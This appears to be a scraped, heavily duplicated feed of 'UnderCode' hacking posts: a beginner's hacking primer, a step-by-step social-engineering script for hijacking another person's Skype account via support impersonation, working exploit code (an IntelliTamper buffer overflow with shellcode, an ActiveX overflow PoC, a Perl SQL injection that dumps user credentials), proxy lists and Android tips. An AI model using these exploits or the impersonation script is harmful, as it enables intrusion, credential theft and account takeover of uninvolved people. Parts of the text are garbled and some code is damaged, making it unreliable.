β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
π¦ From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.
A) 1) Learn a certain amount of English:
γγLearning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.
2) Learn to use basic software:
γγThe basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.
3) Preliminary understanding of network protocols and working principles: The
γγso-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.
4) Familiar with several popular programming languages ββand scripts:
γγAs mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ββand know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ββInitially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ββContact, so long as you are proficient in one of them, other languages ββcan be the same, it is recommended to learn C language and htm hypertext language.
π¦ How to become a hacker ? the basic skills that hackers should master by undercode :
pinterest.com/UnderCodeOfficial
π¦ ππΌππ πππΈβπ :
π¦ From this section, we have really embarked on the road of learning hackers. The first thing to introduce is the basic skills that must be mastered as a junior hacker. Learning this can be done through this The section reads that hackers are not mysterious, and they are easy to learn. In order to ensure that beginners are interested in hackers, this book adopts a cyclical progress, which means that the content of each chapter is independent and comprehensive. Learners can learn only after studying a chapter completely. In the next chapter.
A) 1) Learn a certain amount of English:
γγLearning English is very important for hackers, because most of the materials and tutorials are now in English, and news about hackers also comes from abroad. A vulnerability needs to be discovered from the introduction in Chinese. For about a week, the network administrator has enough time to patch the vulnerability during this time, so when we see the introduction in Chinese, this vulnerability may have long ceased to exist. Therefore, learning hackers must try to read English materials, use English software, and pay attention to well-known foreign network security websites in time.
2) Learn to use basic software:
γγThe basic software mentioned here refers to two contents: one is the various commands commonly used by computers on our daily lives, such as ftp, ping, net, etc .; on the other hand, we must learn about hacking tools. Use, which mainly includes port scanners, vulnerability scanners, information interception tools and password cracking tools. Because these softwares have many varieties and different functions, this book will introduce several popular software usage methods later. After mastering the basic principles, learners can choose the ones that are suitable for them or can be found in the second part. "To find software development guidelines and write your own hacking tools.
3) Preliminary understanding of network protocols and working principles: The
γγso-called "initial understanding" is to understand the working principles of the network "in accordance with your own understanding method". Because the protocol involves a lot of knowledge and complexity, if you conduct in-depth research at the beginning, it is bound to Will greatly discourage enthusiasm for learning. Here I suggest that learners get a preliminary understanding of the TCP / IP protocol, especially how the network transmits information when browsing the web, how the client browser applies for "handshake information", how the server "responds to handshake information" and "accepts the request" And other content, this part of the content will be described in detail in later chapters.
4) Familiar with several popular programming languages ββand scripts:
γγAs mentioned above, learners are not required to study in depth here, as long as they can understand the relevant languages ββand know the results of program execution. It is recommended that learners learn the C language, asp, and cgi scripting languages ββInitially, and have a basic understanding of the htm hypertext language and php, java, etc., mainly study the "variable" and "array" parts of these languages, because there is an inherent relationship between languages ββContact, so long as you are proficient in one of them, other languages ββcan be the same, it is recommended to learn C language and htm hypertext language.
Pinterest
UndercOde (UNDERCODEOFFICIAL) on Pinterest
UndercOde | πππππ£βπ ππ πππ€π₯πππ βπ ππ‘πππͺ:
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
Programming, Web & Applications makers, Host, bugs fix, Satellite Reicivers Programming..
Started Since 2011
B) 1) Familiar with network applications:
γγNetwork applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
γγNetwork applications include various server software background programs, such as wuftp, Apache and other server backgrounds; there are various online forums and electronic communities. Conditional learners are better off making their own computers into servers, and then installing and running some forum code. After some experimentation, they will perceptually understand the working principle of the network, which is much easier than relying on theoretical learning. Do more with less!
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
>Mental faculties
>Skype
>Quick-thinking
>Social Skills (Minimum hard work required)
π¦ Process
1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;
2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account
3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.
4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.
5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;
π¦6) web page link
Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.
7) Transcript
Daring = Skype |Italics = Me personally
βHi I have ignored my private data regarding my Skype bank account! β
βOh, My partner and i see. Iβd always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? β
βMy Skype title is usually βbobβ in addition to la and orange county bobβ
βThank anyone.
π¦ So that you can assist you We need you to definitely supply the using details:
1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances listβ
1) β Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5β
βThank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? β
βSure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recallβ
βThank anyone make sure you reset to zero your own private data in this article; linkβ
βI donβt have access to in which mail any longer thatβs exactly why Iβm getting in contact with youβ
βWhat can be your new email address contact info? β
βItβs Bob@bobber. bobβ
βThank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? β
βThanks greatly, Zero thatβs alright l8rs: )β
Transcript Conclude
π¦hacking skype tutorial by UnderCode :
fb.com/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
>Mental faculties
>Skype
>Quick-thinking
>Social Skills (Minimum hard work required)
π¦ Process
1) The very first thing you'll want to complete is usually collect the essential info; rather as much as you may get of the bank account anyone are trying to acquire control of. Your proposed info You might want to acquire previous to trying to take this Skype is usually;
2) Full name of the particular person
Documented E-Mail tackle to this Skype
Almost any repayment techniques employed
Sign up date of the Skype
5 acquaintances about the individuals Skype record
Region those is usually coming from
Any E-Mail address that have been listed on the bank account
3) The key bullet-points that you need tend to be; Label, E-mail, Repayment Process in addition to Sign up date that you can generally get away with just by while using calendar year in addition to 5 acquaintances about the individuals Skype record; these include the typical concerns you're inquired to start with although in the event you find some of all of them drastically wrong they are going to preceed to consult anyone the country found in subscription in addition to every other E-Mail address of this particular bank account.
4) Properly contemplating you recognize the title of the particular person or the E-Mail you possibly can simply state any Skype with your two key waste info, generally the repayment process isn't repayment employed if you do not know normally plus the call record talks regarding itself; issues held it's place in a bunch call up subsequently there exists a excellent possibility that person has some of hte people in it on the call record.
5) Right now you could have obtained the details needed, it truly is time and energy to place our own preparing in to steps, at once to the site;
π¦6) web page link
Purely get into the login name of the Skype plus the title of your personnel. Right now I'll provide you with a transcript of how the chat will in all probability proceed, basically abide by my recommendations and will also be productive if your entire info is usually proper. Best of luck.
7) Transcript
Daring = Skype |Italics = Me personally
βHi I have ignored my private data regarding my Skype bank account! β
βOh, My partner and i see. Iβd always be satisfied to assist you with that, May possibly I have your own Skype Label in addition to first title, make sure you? β
βMy Skype title is usually βbobβ in addition to la and orange county bobβ
βThank anyone.
π¦ So that you can assist you We need you to definitely supply the using details:
1) Exactly how does anyone spend? Prior repayment process
2) Precisely what is the e-mail tackle anyone provided from subscription?
3) While does anyone create your own Skype bank account (month/year)
some. Provide us the titles of 5 good friends as part of your acquaintances listβ
1) β Never ever settled
2) bob@bob. joe
3) 1/2 calendar year previously
some. Bob1, bob2, bob3, bob4, bob5β
βThank anyone. You need to furthermore solution:
1) What title does anyone provide from subscription (first + last)
2) What land does you ultimately choose while in subscription?
3) Provide us virtually any previous email address contact info you may have employed? β
βSure,
1) Robert Chad
2) Great britain
3) Merely bob@bob. joe as i recallβ
βThank anyone make sure you reset to zero your own private data in this article; linkβ
βI donβt have access to in which mail any longer thatβs exactly why Iβm getting in contact with youβ
βWhat can be your new email address contact info? β
βItβs Bob@bobber. bobβ
βThank anyone. I have at this point improved your own email address contact info, possibly there is anything else My partner and i will let you with currently? β
βThanks greatly, Zero thatβs alright l8rs: )β
Transcript Conclude
Facebook
UndercOde Testing Company
UndercOde Testing Company. 97 likes Β· 3 talking about this. Programming, Hacking,Security, Web & Applications Developpements, Fix Errors , Hosts, Server Security, Hacking Pentest, Phone softwares &...
Right now this can seem to be a good practice nonetheless it isn't and yes it generally builds up an actual individual interconnection concerning anyone plus the particular person you're talking too, with good signals, good grammar in addition to using recommendations meticulously there is certainly virtually any 99% potential for anyone having this.
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews
π¦ ππΌππ πππΈβπ :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.
by Wojciech Pawlikowski (wojtekp@gmail.com)
/
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";
int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}
serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}
if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}
listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);
printf("[*] Waiting for a connection...\n");
while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}
printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);
for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;
for (i = 0; i < 1536; i )
overflow[i] = NOP;
memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer
i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);
write(cli_sock, req, strlen(req));
printf("[ ] Exploit sent!\n");
close(cli_sock);
}
close(sockfd);
}
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ 2020 deadly cve IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
twitter.com/UndercodeNews
π¦ ππΌππ πππΈβπ :
IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
Based on exploit by Koshi (written in Perl). This one should be more
stable. Just for fun and to learn more about win32 exploitation.
by Wojciech Pawlikowski (wojtekp@gmail.com)
/
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFSIZE 1550
#define NOP 0x90
#define RETADDR 0x7c941EED // jmp esp ntdll.dll
/* win32_exec - EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */
unsigned char shellcode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x42"
"\x58\x30\x42\x31\x50\x41\x42\x6b\x41\x41\x52\x41\x32\x41\x41\x32"
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x6d\x39\x59\x6c\x69"
"\x78\x41\x54\x75\x50\x77\x70\x45\x50\x6c\x4b\x73\x75\x55\x6c\x4e"
"\x6b\x61\x6c\x33\x35\x54\x38\x55\x51\x7a\x4f\x4c\x4b\x70\x4f\x45"
"\x48\x4c\x4b\x33\x6f\x67\x50\x45\x51\x4a\x4b\x43\x79\x6c\x4b\x34"
"\x74\x4c\x4b\x47\x71\x6a\x4e\x64\x71\x6f\x30\x5a\x39\x6e\x4c\x4e"
"\x64\x4f\x30\x30\x74\x45\x57\x79\x51\x6b\x7a\x74\x4d\x37\x71\x5a"
"\x62\x4a\x4b\x5a\x54\x55\x6b\x31\x44\x71\x34\x55\x54\x71\x65\x4b"
"\x55\x6c\x4b\x73\x6f\x61\x34\x45\x51\x78\x6b\x65\x36\x6c\x4b\x36"
"\x6c\x50\x4b\x4e\x6b\x71\x4f\x57\x6c\x35\x51\x38\x6b\x4c\x4b\x77"
"\x6c\x6e\x6b\x77\x71\x6a\x4b\x4c\x49\x71\x4c\x37\x54\x34\x44\x7a"
"\x63\x54\x71\x39\x50\x61\x74\x6c\x4b\x43\x70\x46\x50\x4b\x35\x49"
"\x50\x72\x58\x46\x6c\x6c\x4b\x47\x30\x36\x6c\x6c\x4b\x70\x70\x37"
"\x6c\x4e\x4d\x4c\x4b\x65\x38\x46\x68\x7a\x4b\x64\x49\x4e\x6b\x4f"
"\x70\x6e\x50\x77\x70\x77\x70\x45\x50\x6c\x4b\x70\x68\x37\x4c\x63"
"\x6f\x64\x71\x49\x66\x73\x50\x31\x46\x6e\x69\x59\x68\x4b\x33\x69"
"\x50\x51\x6b\x30\x50\x32\x48\x5a\x4f\x5a\x6e\x69\x70\x45\x30\x33"
"\x58\x4c\x58\x6b\x4e\x4c\x4a\x76\x6e\x66\x37\x6b\x4f\x7a\x47\x30"
"\x6d\x53\x43\x62\x50\x53\x51\x73\x59\x32\x4e\x33\x44\x45\x50\x42";
int
main(void)
{
struct sockaddr_in serv_sin, cli_sin;
int i, sockfd, cli_sock, sock_opt = 1, sin_len;
char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE 100] = { 0 };
sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sockfd < 0)
{
perror("socket()");
exit(-1);
}
serv_sin.sin_family = AF_INET;
serv_sin.sin_port = htons(80);
serv_sin.sin_addr.s_addr = INADDR_ANY;
if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
{
perror("setsockopt()");
close(sockfd);
exit(-1);
}
if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
{
perror("bind()");
close(sockfd);
exit(-1);
}
listen(sockfd, 1);
sin_len = sizeof(struct sockaddr);
printf("[*] Waiting for a connection...\n");
while (1)
{
cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
if (cli_sock < 0)
{
perror("accept()");
exit(-1);
}
printf("[ ] Connection from %s:%d\n", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));
read(cli_sock, buf, sizeof(buf) - 1);
overflow = (char *)malloc(BUFSIZE 1);
for (i = 0; i <= 1540; i = 4)
*(long *)&overflow[i] = RETADDR;
for (i = 0; i < 1536; i )
overflow[i] = NOP;
memcpy(overflow 550, shellcode, strlen(shellcode));
memcpy(overflow i 4, "\xe9\x14\xfc\xff\xff", 5); // jmp -1000 - jump to our buffer
i = sprintf(req, "200 HTTP/1.1\r\nDate: 2008-07-24 20:14:31\r\nLocation: ");
memcpy(req i, overflow, strlen(overflow));
memcpy(req i strlen(overflow), "\r\n\r\n", 4);
write(cli_sock, req, strlen(req));
printf("[ ] Exploit sent!\n");
close(cli_sock);
}
close(sockfd);
}
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
pinterest.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
>var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}
document.write(body buf body1);
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC
pinterest.com/undercodeOfficial
π¦ ππΌππ πππΈβπ :
>var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="'; var body1='"></OBJECT>'; var buf='';
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i ){buf=buf unescape(" ");}
document.write(body buf body1);
Written by UnderCode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best http proxy list sites:
http://www.proxyserverlist24.top/?m=1
http://www.httptunnel.ge/ProxyListForFree/aspx
http://spys.one/en/http-proxy-list/
https://hidemyna.me/en/proxy-list/
https proxy list sites :
http://free-proxy.cz/fr/
https://www.proxynova.com/proxy-server-list/port-8080/
sock 4+5 proxy sites:
http://www.socksproxylist24.top/?m=
https://www.socks-proxy.net
https://sockslist.net
http://spys.one/en/socks-proxy-list/
http://www.gatherproxy.com/sockslist
https://www.sslproxies.org/
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Best http proxy list sites:
http://www.proxyserverlist24.top/?m=1
http://www.httptunnel.ge/ProxyListForFree/aspx
http://spys.one/en/http-proxy-list/
https://hidemyna.me/en/proxy-list/
https proxy list sites :
http://free-proxy.cz/fr/
https://www.proxynova.com/proxy-server-list/port-8080/
sock 4+5 proxy sites:
http://www.socksproxylist24.top/?m=
https://www.socks-proxy.net
https://sockslist.net
http://spys.one/en/socks-proxy-list/
http://www.gatherproxy.com/sockslist
https://www.sslproxies.org/
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
twitter.com/UndercodeNews
π¦ ππΌππ πππΈβπ :
#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
exit();
}
} close($sock); # ldma
π¦TESTED BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit
twitter.com/UndercodeNews
π¦ ππΌππ πππΈβπ :
#!/usr/bin/perl use IO::Socket;
print q{
-----------------------------------------------
Arctic Issue Tracker v2.0.0 exploit by ldma
~ SubCode ~
use: arctic.pl [server] [dir]
sample:
$perl arctic.pl localhost /arctic/
----------------------------------------------- }; $webpage = $ARGV[0];
$directory = $ARGV[1];
print " -initiating\n";
print "|--modules..OK!\n";
sleep 1;
print "|--premodules..OK!\n";
sleep 1;
print "|--preprocessors..OK!\n";
sleep 1;
print " -opening channel.. OK!\n";
sleep 2;
print "--------------------------------------------\n";
print "~ configuration complete.. OK!\n";
print "~ scanning";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
if (!$webpage) { die "\ rtfm geek\n"; } $wbb_dir =
"http://".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--"; print "~ connecting";
$|=1;
foreach (1..1) {
print ".";
sleep 1;
}
print " OK!\n";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Server\n"; print "~ open exploiting-tree";
$|=1;
foreach (1..2) {
print ".";
sleep 1;
}
print " OK!\n";
print $sock "GET $wbb_dir HTTP/1.1\n";
print $sock "Accept: */*\n";
print $sock "User-Agent: Hacker\n";
print $sock "Host: $webpage\n";
print $sock "Connection: close\n\n";
print "[ ] Target: $webpage\n";
while ($answer = <$sock>) {
if ($answer =~ /Current Filter: <strong>(.*)<\/strong>/) {
print "exploiting in progress";
$|=1;
foreach (1..3) {
print "...";
sleep 1;
}
print "OK!\n[ ] vuln: OK!\n\n\nwell done, ldma!\n\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
print "[ ] USER-ID: -1\n";
print "[ ] ID-HASH: $1\n";
print "
exit();
}
} close($sock); # ldma
π¦TESTED BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
X (formerly Twitter)
UNDERCODE NEWS (@UndercodeNews) on X
π¦ Latest in Cyber & Tech News with AI-Powered Analysis and Fact Checking.
γjoin us: https://t.co/YVv330UsjQ
More: @DailyCve @UndercodeUpdate
γjoin us: https://t.co/YVv330UsjQ
More: @DailyCve @UndercodeUpdate
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How improve android Ram 2020-Speedup 2020 by Undercode:
T.me/UndercodeTesting
π¦ ππΌππ πππΈβπ :
1) Delete unused widgets (desktop tools) or try to avoid downloading software to the desktop as a shortcut:
2)Android 4.0 operating system , after downloading software by google app , it will automatically download new software to the desktop as a shortcut , which will consume RAM. In addition to deleting the rarely used desktop shortcuts by yourself , you can also remove the " Add icon to home screen " or " Automatically add gadgets " option in the settings of Google PLAY
3) Using the management application tool, view the programs occupying RAM space:
Use the Android phone's own application management tool to delete the less-used programs that occupy RAM space and free up RAM space. Operation method: "Settings"> "Applications"> "Running", and then will occupy large but less RAM The application stopped.
4) Use the phone's built-in software or download management tool to terminate the process and free up memory RAM space:
When the user keeps opening the page , the RAM space is easily occupied. At present, many brands of mobile phones provide tools to free up RAM space (such as the tool manager of SAMSUNG ..) , there are many similar management tools in Google Play (see here for details ) , you can easily close the opened page , free up RAM space Out.
5) Turn on virtual RAM via Swapper and place it on SD memory card
Android phones can use SWAPPER app to put virtual RAM on SD memory card after flashing. However , this will be part of the SD card space as a way of RAM , you must take the risk of brush machine , and a slower reading speed of virtual RAM and easy consumption, hot and let the phone SD reduction in life , basically not recommended.
6) Shut down and re-enable
